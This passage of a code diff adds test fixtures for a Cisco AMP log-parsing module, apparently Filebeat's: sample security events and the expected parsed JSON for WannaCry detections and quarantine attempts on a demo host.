+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":4688,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":286000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":802000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867976","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log-expected.json new file mode 100644 index 000000000000..2dcd9193111e --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log-expected.json @@ -0,0 +1,2425 @@ +[ + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847664", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 0, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847663", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 1193, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847662", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 2379, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847661", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 3572, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847659", + "cisco.amp.error.description": "Cannot delete", + "cisco.amp.error.error_code": 3221225761, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 4765, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847657", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 5950, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229331435814973", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 572000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 7136, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419229331435814969", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 120000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "7bf2b57f2a205768755c07f238fb32cc", + "file.hash.sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10", + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.name": "u.wnry", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 8409, + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 1008, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "7bf2b57f2a205768755c07f238fb32cc", + "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229331435814970", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 73000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 9938, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419229331435814968", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 26000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 11210, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847660", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 12488, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847658", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 13608, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229322845880359", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 14728, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:04.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229327140847671", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 870000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229327140848000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 15848, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:04.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419229327140847666", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + 